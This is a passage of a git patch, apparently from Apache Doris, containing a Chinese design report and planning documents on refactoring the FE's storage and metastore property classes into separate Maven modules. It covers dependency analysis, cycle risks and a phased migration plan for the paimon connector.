DLF**——全模块最重 | `IcebergExternalCatalog`(8)、`PaimonExternalCatalog`(5)、`DLFCatalog`(1,new)、`CacheSpec`、`JdbcResource` | +| **`fileformat`** | 12 | 解析文件格式属性(CSV/Text/JSON/Parquet/ORC),产出 `TFileAttributes`/`TResultFileSinkOptions` 等 thrift 结构 | **零重型第三方依赖** | thrift(fe-thrift,安全)、`Separator`、`Util.getFileCompressType`、`ConnectContext`(会话变量) | +| **`common`** | 4 | AWS 凭据 provider 构造 + iceberg-aws 凭据辅助 | aws-sdk-v2;**其中 2 个文件 import iceberg.aws** | —— | +| **`constants`** | 3 | 常量定义 | 仅 guava `Strings`(轻) | 无 | +| `ConnectionProperties.java` | 1 | 反射式属性绑定基类(被 `StorageProperties`/`MetastoreProperties` 继承) | hadoop `Configuration` | `common.CatalogConfigFileUtils`(fe-common,安全) | + +关键洞察: + +- **`storage` 与 `metastore` 的依赖重量天差地别**。iceberg/paimon 依赖**完全集中在 `metastore`**(`metastore` 有 50 处 iceberg/paimon import,`storage` 有 **0** 处)。 +- **`fileformat` 没有重型第三方依赖**,但对 fe-core 的耦合最深(thrift×12、nereids×11、analysis、qe)——搬它没有"排除重依赖"的收益,只有成本。 +- **`common` 内部可干净拆分**:`AwsCredentialsProviderFactory`/`AwsCredentialsProviderMode`(零 iceberg,被 storage 用)vs `IcebergAwsClientCredentialsProperties`/`IcebergAwsAssumeRoleProperties`(import iceberg,**只被 metastore 用**)。 + +--- + +## 3. 使用方清单(谁在用 `property`) + +- `datasource.property.*` 目前**只被 fe-core 使用**:fe-core 内 **100 个文件、128 处 import**;其它 module(fe-connector / fe-filesystem 等)**零引用**(正因为它被锁在 fe-core 里无法复用——这正是要解决的痛点)。 +- 外部使用按子包分布:`storage`(28 文件引用)、`common`(8)、`ConnectionProperties`(2)、`metastore`(1)。 +- 主要入口(对外 API 契约): + - `StorageProperties.createAll(Map)` / `createPrimary(Map)` —— 最常被调用,存储属性解析总入口 + - `MetastoreProperties.create(Map)` —— catalog 连接属性总入口 + - `FileFormatProperties.createFileFormatProperties(...)` —— 文件格式属性入口 +- 这意味着抽出后,fe-core 反过来 `compile` 依赖新 module 即可;**爆炸半径完全在 fe-core 内**,无第三方/下游 module 受影响。 + +--- + +## 4. 依赖分析(可行性核心) + +把 `property/` 对 `org.apache.doris.*` 的**全部 35 个出向符号**逐一定位到 owning module,分类如下: + +### 4.1 安全依赖(位于 fe-core 之下的模块,不构成循环)— 26 个 + +| 类别 | 数量 | owning module | 说明 | +|---|---|---|---| +| 生成的 thrift(`T*`) | 9 | **fe-thrift** | `TResultFileSinkOptions/TFileFormatType/TFileAttributes/TFileTextScanRangeParams/TFileCompressType/TS3StorageParam/TParquetVersion/TParquetCompressionType/TCredProviderType` | +| 生成的 proto | 3 | **fe-grpc** | `cloud.proto.Cloud` 及其嵌套枚举(S3Properties 云上模式用) | +| fe-common / fe-sql-parser | 14 | **fe-common**(13)/ **fe-sql-parser**(1) | `UserException/Config/DdlException/AnalysisException(fe-common版)/CatalogConfigFileUtils/credentials.CloudCredential` + **整个 `common.security.authentication.*` 家族**(`HadoopAuthenticator/ExecutionAuthenticator/HadoopExecutionAuthenticator/HadoopSimpleAuthenticator/SimpleAuthenticationConfig/KerberosAuthenticationConfig/AuthenticationConfig`,均在 fe-common 而非 fe-authentication);`nereids.exceptions.AnalysisException` 在 **fe-sql-parser** | + +> ⚠️ 纠正一个常见误判:`nereids.exceptions.AnalysisException` 与 `common.security.authentication.*` 都**不在 fe-core**(分别在 fe-sql-parser、fe-common),因此**不是**循环依赖障碍。 + +### 4.2 真正的 fe-core 反向依赖(循环风险)— 9 个 + +| 符号 | 用法 | 难度 | 归属子包 | +|---|---|---|---| +| `IcebergExternalCatalog` | **仅读字符串常量**(`ICEBERG_HMS/REST/GLUE/HADOOP/DLF/JDBC/S3_TABLES` 及 manifest-cache 常量) | 易(常量上提到 `constants` 子包,反转引用方向) | metastore | +| `PaimonExternalCatalog` | **仅读字符串常量**(`PAIMON_HMS/JDBC/DLF/REST/FILESYSTEM`) | 易(同上) | metastore | +| `analysis.Separator` | 仅 `convertSeparator(String)` 静态方法 | 易(下沉/复制纯字符串转换) | fileformat | +| `common.util.Util` | 仅 `getFileCompressType(String)` 静态方法 | 易(抽出该单方法) | fileformat | +| `common.util.S3URI` | `S3URI.create(...)` + 常量(403 行,自包含 URI 解析器,自身只依赖 UserException) | 易(整类下沉 fe-common 或新 module) | **storage** | +| `catalog.JdbcResource` | 仅常量 `DRIVER_URL/CLASS` + `getFullDriverUrl()` | 易(抽出常量+该方法,勿搬整类——它继承重型 Resource) | metastore | +| `datasource.metacache.CacheSpec` | `fromProperties/isCacheEnabled/...`(轻量 value+parser,只依赖 fe-common+commons+guava) | 易(下沉 fe-common/新 module) | metastore | +| `qe.ConnectContext` | `ConnectContext.get().getSessionVariable().enableTextValidateUtf8`(读 1 个会话布尔,带默认值) | 中(反转:用一个小 SessionFlags 接口/入参传入) | fileformat | +| `datasource.iceberg.dlf.DLFCatalog` | **`new DLFCatalog()` + initialize()**,返回 iceberg `Catalog`(真实行为依赖,类本身 extends iceberg HiveCatalog) | 难(须用 SPI/工厂反转 catalog 构造) | metastore | + +**分布很关键**: +- `storage` 的 9 个反向依赖里**只占 1 个**(`S3URI`,且最易处理)。 +- `fileformat` 占 3 个(`Separator/Util/ConnectContext`)。 +- `metastore` 占 5 个(`Iceberg/PaimonExternalCatalog/DLFCatalog/JdbcResource/CacheSpec`),其中 **`DLFCatalog` 是唯一真正的行为级耦合**。 + +### 4.3 循环依赖的硬证据(决定"整包搬出不可行") + +三个 fe-core 类**反向 import 了 property 包**(各 1 处,已逐一核实): + +``` +fe-core/.../datasource/iceberg/IcebergExternalCatalog.java → import datasource.property.* +fe-core/.../datasource/paimon/PaimonExternalCatalog.java → import datasource.property.* +fe-core/.../datasource/iceberg/dlf/DLFCatalog.java → import datasource.property.* +``` + +只要 `metastore` 仍 import 这三个类、而它们又 import property 包,把 metastore 搬到 fe-core 之前就会形成 `fe-property → fe-core → fe-property` 循环,Maven 直接拒绝。 + +### 4.4 重型第三方依赖与"不进 jar"策略 + +| 库 | maven 坐标(版本由 fe/pom.xml dependencyManagement 统一管理) | 用法 | 出现在 | 排除策略 | +|---|---|---|---|---| +| hadoop-common | `org.apache.hadoop:hadoop-common`(hadoop 3.4.2) | `Configuration` 作字段/构造/参数类型(17 文件) | storage, metastore, ConnectionProperties | **provided** | +| hadoop-hdfs-client | `org.apache.hadoop:hadoop-hdfs-client` | 仅 `HdfsClientConfigKeys` 常量(1 文件,非编译期常量,类仍须在编译路径) | storage | **provided** | +| hive-common | `org.apache.hive:hive-common`(2.3.9);**运行时实际由 `hive-catalog-shade` 提供(已 relocate)** | `HiveConf` 作字段/构造/返回类型(5 文件) | metastore | provided(注意与 shade 版本耦合) | +| aws-sdk-v2 | `software.amazon.awssdk:{auth,sts,regions,s3tables}`(BOM 2.29.52) | 凭据 provider 返回类型、STS、Region、S3Tables 客户端(~40 处) | storage, metastore, common | **provided** | +| iceberg | `org.apache.iceberg:{iceberg-core,iceberg-aws}`(1.10.1)+ **iceberg-hive-metastore(仅传递依赖)** | `Catalog` 返回类型 + 常量 | **metastore** | provided(**留在 fe-core** 则无需) | +| paimon | `org.apache.paimon:{paimon-core,paimon-common}` + paimon-hive(经 shade) | `Catalog` 返回类型、`Options` 字段 | **metastore** | provided(**留在 fe-core** 则无需) | +| **glue** | **❌ 无 maven 坐标——`com.amazonaws.glue.catalog.*` 是 vendored 在 fe-core 的源码(38 个 .java)** | `AWSGlueConfig` 常量 + 客户端类型 | metastore | **无法 provided**,须连源码一起处理 | +| aliyun DLF | `com.aliyun.datalake:metastore-client-*`(仓库内**经 hive-catalog-shade 打包**,`ProxyMetaStoreClient` 干净坐标本地不存在) | `DataLakeConfig` 常量、`ProxyMetaStoreClient` | metastore(4 文件 import DataLakeConfig) | provided(坐标需补,注意 shade 来源) | +| guava / commons-lang3 / commons-collections4 | 33.2.1-jre / 3.19.0 / —— | 轻量工具 | 全部 | **compile**(轻,随 jar 一起,与 fe-catalog 约定一致) | + +**核心结论**:`storage`(+纯 AWS 的 common)只触及 **hadoop + aws-sdk** 两类重依赖,二者都是"编译期类型、运行时由消费方提供",**`provided` scope 完全满足**用户"不进最终 jar"的约束。而 iceberg/paimon/glue/dlf/hive 这些最棘手的(含 vendored 源码、shade 版本耦合)**全部集中在 metastore**——把 metastore 留在 fe-core,新 module 就彻底不碰它们。 + +--- + +## 5. 对抗式复核要点(surface conflicts) + +两个 verifier 对"原始综述"提出关键修正,已采纳并在本报告中纠正: + +1. **"整包搬出后 module 不再需要 iceberg/paimon/aws"——证伪。** metastore 的 `*Properties` 本身就是 catalog 构造层(`AbstractIcebergProperties.initCatalog():Catalog`、`AbstractPaimonProperties.initializeCatalog():Catalog`),**直接 import 并 new iceberg/paimon catalog**,不止 `DLFCatalog` 一处。所以"只上提常量+反转 DLFCatalog"并不能让整包摆脱重型 SDK。→ **正确做法是不搬 metastore。** +2. **Glue 是 vendored 源码(38 文件)而非依赖——证实。** `HiveGlueMetaStoreProperties` import 的 `com.amazonaws.glue.catalog.util.AWSGlueConfig` 在整个仓库只存在于 fe-core.jar;无 `provided` 坐标可加。→ **又一条 metastore 必须留在 fe-core 的硬理由。** +3. **循环依赖(catalog 类反向 import property 包)——证实**(见 4.3)。 + +这些修正不削弱"storage 子集可抽出"的结论,反而把"metastore 不可抽出"钉死,使最终方案更清晰。 + +--- + +## 6. 推荐方案 + +### 6.1 新建 `fe-property` 模块,抽出"干净子集" + +**搬入 `fe-property` 的内容(约 25 文件):** +- `storage/*`(20)+ `storage/exception/*`(1) +- `common/AwsCredentialsProviderFactory.java`、`common/AwsCredentialsProviderMode.java`(2,零 iceberg) +- `constants/*`(3) +- `ConnectionProperties.java`(1) + +**留在 fe-core 的内容:** +- `metastore/*`(28)—— 循环依赖 + vendored glue + 直接构造 iceberg/paimon catalog +- `fileformat/*`(12)—— 无重依赖、却深耦合 thrift/nereids/analysis/qe,搬迁无收益 +- `common/IcebergAwsClientCredentialsProperties.java`、`common/IcebergAwsAssumeRoleProperties.java`(2,import iceberg,仅被 metastore 用) + +### 6.2 搬迁前置改造(precondition fixups) + +1. **下沉 `S3URI`**:把 `common.util.S3URI`(403 行,自身仅依赖 UserException)移到 `fe-property`(或 fe-common)。这是 storage 唯一的 fe-core 反向依赖,移走后 storage 对 fe-core 零依赖。 +2. **避免 split-package**:`property.common` 若一半在 fe-property、一半在 fe-core,会造成同一个包跨两 jar(JVM/Maven 不允许)。解法:把 2 个 iceberg-aws 辅助类从 `property.common` **挪进 `property.metastore`**(它们只被 metastore 用),使 `property.common` 整体进入 fe-property。 +3. **修正 `HttpProperties` 的误引**:它 import 了 `org.apache.hudi.common.util.MapUtils`(同级 `LocalProperties` 用的是 commons-collections4)。这会把 Hudi 拖进新 module,应改回 commons-collections4。 + +### 6.3 `fe-property` 的 pom 模板(仿 fe-catalog,重依赖翻成 provided) + +- parent=`fe`(version=`${revision}`),packaging=jar,finalName=`doris-fe-property`,test-jar、javadoc skip、release source профиль——照抄 fe-catalog。 +- **compile 依赖**:`fe-foundation`、`fe-common`、`fe-thrift`、`fe-grpc`(兄弟,`${project.version}`);guava、commons-lang3、commons-collections4、log4j-api。 +- **provided 依赖(不进 jar)**:`hadoop-common`、`hadoop-hdfs-client`、`hadoop-aws`、`software.amazon.awssdk:{auth,sts,regions,s3,s3tables}`。**无需 iceberg/paimon/hive/glue/dlf**(都随 metastore 留在 fe-core)。 +- **建议加 fe-connector 式的 import-gate**(exec-maven-plugin,validate 阶段)禁止 `fe-property` import `org.apache.doris.datasource.{iceberg,paimon}` 及 fe-core 内部包,防止循环依赖复发。 + +### 6.4 构建顺序与消费 + +- 在 `fe/pom.xml` 的 `` 中把 `fe-property` 放在 `fe-foundation/fe-common/fe-thrift/fe-grpc/fe-catalog` 之后、`fe-core` 之前(Maven 实际按依赖图排序,列表顺序对齐即可);在 parent dependencyManagement 加 `fe-property` 条目。 +- `fe-core/pom.xml` 增加一条对 `fe-property` 的 compile 依赖;删除已搬走的源码。fe-core 运行时本就带 hadoop/aws,`provided` 依赖透明解析。 +- **保持 FQN 不变**(`org.apache.doris.datasource.property.storage/common/constants`):由于每个叶子包整体只落在一个 jar(storage/common/constants→fe-property,fileformat/metastore→fe-core,无包被劈开),fe-core 里 metastore/fileformat 对已搬类的 import **无需改动**,仅物理移动文件。 + +--- + +## 7. 风险与坑 + +1. **hive-catalog-shade / paimon-hive-shade 版本耦合**:`HiveConf`、DLF、iceberg-hive、paimon-hive 在 fe 里运行时来自**relocate/shade** 的制品(HMS 钉 2.3.7、thrift relocate、内嵌远古 fastutil)。本方案把这些**全留在 fe-core**,规避了该坑;若将来要搬 metastore 必须正面处理。 +2. **vendored Glue 源码(38 文件)**:`metastore` 留在 fe-core 即可继续编译;不可低估其搬迁成本。 +3. **`S3URI` 下沉**:需确认其无其它 fe-core 专属依赖(初查仅 UserException,干净)。下沉后 fe-core 内其它调用方自动从下层 module 解析(fe-core 仍依赖 fe-property,无碍)。 +4. **`ConnectContext` 反转**:`fileformat` 留在 fe-core,本次不涉及;仅当未来要抽 fileformat 时才需做 SessionFlags 接口反转。 +5. **fe-thrift / fe-grpc 是真实编译依赖**(S3Properties 用 `TS3StorageParam/TCredProviderType` + `cloud.proto.Cloud`),不是可选项,pom 必须显式声明。 +6. **`provided` 的运行时契约**:消费方(fe-core、以及将来若依赖它的 SPI 插件)**必须**自带 hadoop/aws。fe-core 满足;SPI 插件本就 child-first 自带 hadoop/aws(见历史 RC-3 self-contained bundling),也满足。 + +--- + +## 8. 工作量与分阶段路径 + +| 阶段 | 内容 | 规模 | +|---|---|---| +| P1 | 前置改造:下沉 `S3URI`;2 个 iceberg-aws 类从 common 挪进 metastore;修 `HttpProperties` 的 hudi 误引 | 小(~5 文件) | +| P2 | 新建 `fe-property` module + pom(provided=hadoop+aws)+ 加入 reactor/dependencyManagement | 小 | +| P3 | 物理搬迁 storage/common(纯AWS)/constants/ConnectionProperties;fe-core 加 `fe-property` 依赖;编译打通 | 中(~25 文件移动,FQN 不变故 import 基本不动) | +| P4 | 加 import-gate 守卫;跑 fe-core 全量编译 + 相关 UT;核对最终 `doris-fe-property.jar` 内**不含** hadoop/aws/iceberg/paimon class | 中(验证为主) | +| (可选,后续)| 若要进一步抽 `fileformat`:先做 `Separator/Util.getFileCompressType` 下沉 + `ConnectContext` 会话标志反转 | 中 | +| (不建议)| 抽 `metastore`:须反转所有 `initCatalog/initializeCatalog/factory.create` 至 SPI + 搬 vendored glue + 解 shade 版本耦合 | 大,收益低 | + +成功判据(强约束,可独立 loop 验证): +- `mvn -pl fe/fe-property -am package` 成功; +- `unzip -l fe/fe-property/target/doris-fe-property.jar` **不含** `org/apache/hadoop/**`、`software/amazon/**`、`org/apache/iceberg/**`、`org/apache/paimon/**`、`com/amazonaws/**`; +- fe-core 全量编译通过、storage 相关 UT 全绿; +- fe-connector(或任一 fe-core 之外的 module)能成功 `compile` 依赖 `fe-property` 并调用 `StorageProperties.createAll(...)`(验证"可复用"目标达成)。 + +--- + +## 9. 总结 + +- 用户的设想**部分成立且值得做**:最具复用价值的**对象存储/HDFS/Azure 属性解析(storage)** 是**可干净抽出**的——它零 iceberg/paimon 依赖、对 fe-core 仅 1 处易解的反向依赖、重依赖仅 hadoop+aws 且可 `provided` 排除出 jar。抽出后,fe-connector 等 module 即可复用,**正好消除 minio 那类"在连接器里重写属性解析"的重复**。 +- 但**"把整个 `property/` 搬出"不可行**:`metastore` 子包是 catalog 构造层,直接 new iceberg/paimon/hive/glue/dlf 客户端、import 重型 SDK、依赖 vendored Glue 源码,并与 fe-core 的 `*ExternalCatalog` 构成**循环依赖**。它本质是 fe-core/连接器领域逻辑,不是"通用属性解析",应留在 fe-core。`fileformat` 无重依赖但深耦合 thrift/nereids/qe,搬迁无收益,亦留在 fe-core。 +- **推荐**:新建 `fe-property`(依赖 fe-foundation,**不并入** fe-foundation 以免污染其零依赖基座),抽 `storage + common(纯AWS) + constants + ConnectionProperties`,重依赖 `provided`,加 import-gate 防循环复发。中等工作量,风险可控。 From 5bf6ceee39662549e368476c8a8472956a004f9c Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 13:26:15 +0800 Subject: [PATCH 075/128] [P0-T01] storage-refactor: recon verdict + DV-001/D-009 (bind-all mechanism) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Phase P0+P1 (paimon storage 收口) approved. P0-T01 recon (4-agent + direct read) over the three StorageProperties trees + connector seam: - F1 (equivalence, non-blocking): fe-filesystem toHadoopConfigurationMap() / toMap() match the fe-property path paimon uses today on the common static-credential case for every backend (COS identical; OSS/OBS identical incl jindo/cosn/obs blocks); fe-filesystem is a superset (S3 assume-role/anon; OSS/COS/OBS endpoint/region unconditional vs lenient). Treat fe-filesystem as the new source of truth; T1 pins the common case + documents the additive diffs. - F2 (feasibility, blocker): no raw map -> List binder exists (provider registry private, only first-match createFileSystem). So getStorageProperties() cannot be confined to DefaultConnectorContext -> falsifies the design's P0-1 expectation and the "single fe-core change" whitelist. Recorded DV-001; user chose mechanism A -> D-009: add additive FileSystemPluginManager. bindAll(Map); getStorageProperties() obtains the raw map via the existing supplier's getOrigProps() (no construction-site change). Wrote back: design §4 P0-1/P0-2 + §2.1, WORKFLOW §4.1 whitelist (+1 FileSystemPluginManager.java), decisions D-009, risks R-004, tasks P0-T01(done)/P0-T02/P1-T02, PROGRESS, HANDOFF. No code yet. Co-Authored-By: Claude Opus 4.8 (1M context) --- ...age-property-refactor-design-2026-06-17.md | 357 +++++++++++++++ .../metastore-storage-refactor/HANDOFF.md | 36 ++ .../metastore-storage-refactor/PROGRESS.md | 43 ++ plan-doc/metastore-storage-refactor/README.md | 68 +++ .../metastore-storage-refactor/WORKFLOW.md | 146 ++++++ .../decisions-log.md | 62 +++ .../deviations-log.md | 21 + plan-doc/metastore-storage-refactor/risks.md | 38 ++ plan-doc/metastore-storage-refactor/tasks.md | 110 +++++ ...ilesystem-storage-spi-review-2026-06-17.md | 430 ++++++++++++++++++ 10 files changed, 1311 insertions(+) create mode 100644 plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md create mode 100644 plan-doc/metastore-storage-refactor/HANDOFF.md create mode 100644 plan-doc/metastore-storage-refactor/PROGRESS.md create mode 100644 plan-doc/metastore-storage-refactor/README.md create mode 100644 plan-doc/metastore-storage-refactor/WORKFLOW.md create mode 100644 plan-doc/metastore-storage-refactor/decisions-log.md create mode 100644 plan-doc/metastore-storage-refactor/deviations-log.md create mode 100644 plan-doc/metastore-storage-refactor/risks.md create mode 100644 plan-doc/metastore-storage-refactor/tasks.md create mode 100644 plan-doc/reviews/fe-filesystem-storage-spi-review-2026-06-17.md diff --git a/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md b/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md new file mode 100644 index 00000000000000..95c44948390055 --- /dev/null +++ b/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md @@ -0,0 +1,357 @@ +# fe-core / fe-connector / fe-filesystem 属性体系重构设计方案(paimon 优先) + +> 目标:把 fe-core 的 **Storage Property** 全部收口到 `fe-filesystem`、把 **MetaStore Property** 收口到 `fe-connector` 的新 SPI/API,最终从 fe-core 彻底删除两者,并淘汰临时模块 `fe-property`。 +> 设计聚焦 **paimon** 连接器(唯一已实质迁移属性的连接器),但 SPI 形状要让 hive/hudi/iceberg 后续直接套用、不再重抄。 +> 日期:2026-06-17 | 方法:8-agent 现状取证 + 关键事实 `grep` 复核(见文末附录)。配套背景报告:`plan-doc/reviews/fe-filesystem-storage-spi-review-2026-06-17.md`。 + +--- + +## 0. 决策摘要(已与架构师确认) + +| # | 决策点 | 选定方案 | +|---|---|---| +| ① | MetaStore Property SPI/API 模块归属 | **新建 `fe-connector-metastore-api` + `fe-connector-metastore-spi` 模块对**,镜像 fe-filesystem 的 api/spi 拆分 | +| ② | 跨引擎连接逻辑去重策略 | **混合**:HMS/DLF/Glue/REST/JDBC 的「连接事实解析器」在 metastore-spi 实现一次;每个连接器只写薄的 catalog adapter 消费这些 facts | +| ③ | 连接器如何获取 Storage Property | **fe-core 在 CREATE CATALOG 入口绑定 `StorageProperties`(用 fe-filesystem 全量+providers),把已绑定对象经 `ConnectorContext` 传给连接器**;连接器只见 `fe-filesystem-api` 接口 | +| ④ | typed MetaStore 属性的绑定机制 | **复用 fe-foundation 的 `@ConnectorProperty` + `ConnectorPropertiesUtils`**(别名优先级 / required / sensitive / matchedProperties 全免费) | +| ⑤ | MetaStore 后端「类型」如何表达(**D-006**) | **api 层不放 per-backend `MetaStoreType` 枚举**;用 `String providerName()` + 能力方法 + `MetaStoreProvider.supports(Map)` 自识别 + ServiceLoader 发现,镜像 `FileSystemProvider`。新增后端零 api/spi 改动 | +| ⑥ | Kerberos 归属(**D-007**) | **新建叶子模块 `fe-kerberos`**(仅 hadoop-auth/common),搬入 fe-common `security.authentication.*` 作唯一真相源,fe-filesystem-hdfs 删自有副本改依赖它。⚠️ 全量去重超出本次 paimon-only 范围,分两步(见 D-007) | +| ⑦ | Vended creds 边界(**D-008**) | **连接器只「抽取」SDK token,fe-core 单点「归一」**(`ctx.vendStorageCredentials` 用 providers 重绑 → BE map);连接器保持 api-only | + +**目标依赖图(终态)** + +``` +fe-foundation (叶子: @ConnectorProperty / ConnectorPropertiesUtils / ParamRules) +fe-extension-spi (叶子: Plugin / PluginFactory) +fe-kerberos (叶子 D-007: security.authentication.* / HadoopAuthenticator / Kerberos; 仅 hadoop-auth/common) + ▲ ▲ ▲ + │ │ │ +fe-filesystem-api (纯 JDK 契约) │ (fe-kerberos 被 fe-filesystem-hdfs / fe-connector-* / fe-common / fe-core 共用) + ▲ ▲ │ + │ │ │ +fe-filesystem-spi fe-connector-api ──► fe-thrift(provided) + ▲ (providers s3/oss/...) ▲ ▲ + │ (fe-filesystem-hdfs ──► fe-kerberos) │ + │ fe-connector-spi fe-connector-metastore-api ──► fe-foundation, fe-filesystem-api + │ ▲ ▲ + │ │ │ (无 per-backend 枚举 D-006) + │ fe-connector-metastore-spi (共享后端 fact 解析器 + MetaStoreProvider SPI/ServiceLoader) + │ ▲ + │ fe-connector-paimon / -iceberg / -hive / ... (薄 adapter, 各注册 MetaStoreProvider) + │ +fe-core ──► fe-filesystem(全量, 含 providers) + fe-connector(api/spi/metastore-spi 经由连接器) + fe-kerberos + +约束: fe-connector-* 任何模块 ──╳──► fe-core (CI gate 强制) + fe-filesystem-* 任何模块 ──╳──► fe-core / fe-connector + fe-kerberos ──╳──► fe-core / fe-connector / fe-filesystem (纯叶子, 仅 hadoop) +``` + +终态边核对(与用户目标逐条对齐): +- `fe-core → fe-connector + fe-filesystem` ✔(fe-core 已依赖 `fe-connector-api/spi`,且依赖 `fe-filesystem-api/spi/local`) +- `fe-connector → 仅 fe-filesystem-api` ✔(通过 `fe-connector-spi` 的 `ConnectorContext.getStorageProperties(): List` 引入 `fe-filesystem-api` 接口类型;连接器不依赖 fe-filesystem-spi/providers) +- `fe-filesystem → 不依赖 fe-connector/fe-core` ✔(现状已满足,api 纯 JDK) + +### 0.1 本次任务范围(重要 — 已与架构师约定) + +**只做迁移 / 新增,不做破坏性删除;只动 paimon,不动其它连接器。** + +| 范围 | 内容 | +|---|---| +| ✅ 本次做 | 新建 `fe-connector-metastore-api/spi`(仅实现 paimon 用到的后端,后端用 `MetaStoreProvider` 自识别、**无枚举** D-006);新增 `ConnectorContext.getStorageProperties()` 让 fe-core 下发已绑定的 fe-filesystem `StorageProperties`;改造 **paimon** 连接器:storage 改走 fe-filesystem-api、metastore 改走新 SPI;移除 paimon 对 `fe-property` 的依赖边;**新建顶层叶子 `fe-kerberos`(additive)+ 让 paimon 的 HMS kerberos facts 走它(P3a,D-007 步骤 a,paimon-local 不碰 fe-common/fe-filesystem-hdfs)** | +| 🚫 本次**不**做 | **不删除** fe-core 的 `datasource.property.storage` / `datasource.property.metastore` 任何类(hive/hudi/iceberg 仍在用,保持不动);**不修改** hive / hudi / iceberg / es / jdbc / mc / trino 任何连接器;fe-property 物理删除留待后续(本次只断开 paimon 的依赖,使其变为孤儿);**不动 fe-common / fe-filesystem-hdfs 的既有 kerberos 路径**(其收口到 fe-kerberos = P3b follow-up) | +| 🔭 范围外(后续任务) | hive/hudi/iceberg 迁移到新 SPI;**P3b**:fe-common + fe-filesystem-hdfs 收口到 `fe-kerberos`(全量去重、统一 `HadoopAuthenticator` 接口);待所有连接器迁完后从 fe-core 彻底删除两个 property 包、删除 `StoragePropertiesConverter`、物理删除 fe-property 模块 | + +> 即本次的「收口」= **让 paimon 不再经由 fe-core 风格的旧 storage-property 模型(fe-property 是其逐字拷贝)获取存储配置,改为消费 fe-core 经 fe-filesystem-api 下发的 typed `StorageProperties`**;fe-core 旧 property 包整体**原样保留**,其删除是后续全连接器迁完后的独立任务。 + +--- + +## 1. 现状(精炼) + +### 1.1 三套 StorageProperties 并存 +| 树 | 形态 | 现状角色 | +|---|---|---| +| `fe-core` `datasource.property.storage.StorageProperties` | 胖抽象类 | **线上引擎路径**(`CatalogProperty.createAll` + `DefaultConnectorContext` + `StoragePropertiesConverter`);hive/hudi/iceberg + paimon 的 BE 侧都走它 | +| `fe-property` `property.storage.StorageProperties` | 胖抽象类(fe-core 的逐字 re-root 拷贝) | **临时**;唯一消费者是 paimon 连接器的 `PaimonCatalogFactory.buildObjectStorageHadoopConfig` | +| `fe-filesystem-api` `filesystem.properties.StorageProperties` | 瘦接口 + `FileSystemProvider

      ` 绑定 SPI | **目标**,但当前**休眠**(0 个 fe-core 消费者,详见背景报告) | + +### 1.2 MetaStore Property = fe-core 的 (引擎 × 后端) 矩阵 +`org.apache.doris.datasource.property.metastore`:28 文件 ~3624 LOC。 + +- 已存在**共享后端连接契约**:`HMSBaseProperties.of()`、`AliyunDLFBaseProperties.of()`、`AWSGlueMetaStoreBaseProperties.of()`——被 Hive/Iceberg/Paimon 的同后端 leaf 复用。 +- 每个 leaf 很薄,~70–80% 是相同的连接装配,仅 ~20–30% 是引擎特定(建各自 SDK catalog)。 +- **重复实测**:HMS 后端被复制约 **4 次**(`HMSBaseProperties` + `Iceberg/Paimon/HiveHMS*` + 连接器侧 `PaimonCatalogFactory.buildHmsHiveConf`);DLF 的 8 行 `DataLakeConfig.CATALOG_*` 块逐字出现 **3 次**;JDBC 的 `registerJdbcDriver + DriverShim`(~50 行)重复 **2 次**。 + +### 1.3 连接器现状 +- 已迁移 es/jdbc/maxcompute/trino:各自 `XxxConnectorProperties`(纯常量 + `Map.get`),**放弃了 typed 模型**,彼此零复用。 +- paimon(迁移中、唯一实质迁移属性者):`PaimonConnectorProperties`(常量 + `String[]` 别名)+ `PaimonCatalogFactory`(627 LOC 纯函数,**手抄** fe-core 的 `AbstractPaimonProperties` + 每个 `Paimon*MetaStoreProperties` + `HMSBaseProperties.getHiveConf` + `PaimonAliyunDLFMetaStoreProperties.buildHiveConf`)。 +- paimon 的唯一非 connector-api/thrift 的 doris import 是 `org.apache.doris.property.storage.StorageProperties`(fe-property,1 处调用 `buildObjectStorageHadoopConfig`)。**metastore 已与 fe-core 解耦,只剩 storage 这一条边要换。** +- `fe-connector-paimon-{api,backend-hms,backend-rest,backend-aliyun-dlf,backend-filesystem}` 与 iceberg 同名目录:**当前分支上是空的 stale 残留**(仅 `.flattened-pom.xml`,无 src、未被父 pom 引用)。per-backend 拆分只在 `catalog-spi-v20260422` 分支以「**catalog-builder SPI(buildCatalog)**」形态存在,**不是** metastore-property SPI。本方案要新建的是 metastore-property SPI(与 buildCatalog SPI 互补)。 + +### 1.4 组合模型(必须保留的不变量) +`CatalogProperty` 持有**一份** raw map,**独立**惰性派生两者:`MetastoreProperties.create(props)` 与 `StorageProperties.createAll(props)`。二者**正交**:storage 作为参数**传入** metastore 初始化(`initializeCatalog(name, List)`),metastore **从不**把 storage 当字段持有;storage 对 metastore 一无所知。HMS 是自洽的(不吃 storage list);只有 FileSystem/HDFS(Kerberos authenticator)与 DLF(OSS)需要 storage。 + +### 1.5 BE 侧转换(必须留在 fe-core) +- `StorageProperties.getBackendConfigProperties()` → BE 规范 map,`CredentialUtils.getBackendPropertiesFromStorageMap` 汇总。 +- `S3Properties.getS3TStorageParam()` → `TS3StorageParam`、`getObjStoreInfoPB()` → `Cloud.ObjectStoreInfoPB`:**唯一** import thrift/cloud-proto 的存储类。 +- 连接器路径已通过 `ConnectorContext`(`getBackendStorageProperties`/`normalizeStorageUri`/`vendStorageCredentials`/`loadHiveConfResources`/`executeAuthenticated`)把这些委托回 fe-core 的 `DefaultConnectorContext`。 + +--- + +## 2. 目标架构与数据流 + +### 2.1 CREATE CATALOG(静态配置)数据流 —— 决策③ +``` +用户 CREATE CATALOG (raw Map) + │ 入口在 fe-core + ▼ +fe-core: List storageList = FileSystemPluginManager.bindAll(rawMap) // D-009: provider 全量 bind + │ (fe-core 依赖 fe-filesystem 全量,可发现 providers) + ▼ +fe-core: 路由到目标连接器, 经 ConnectorContext 传入: + - List (fe-filesystem-api 接口类型, 已绑定) + - 原始 rawMap + ▼ +fe-connector-paimon (PaimonConnector): + - 用 fe-connector-metastore-api 解析 metastore 属性: + MetaStoreProperties ms = HmsMetastoreBackend.parse(rawMap, storageList) // 共享 fact 解析器 + - 用 storageList 的 toHadoopProperties().toHadoopConfigurationMap() 拿 fs.s3a.* 叠到 HiveConf + - 用 ms.toHiveConfOverrides()/facts 拿 hive.* / dlf.catalog.* 叠到 HiveConf + - 建 paimon Catalog (在 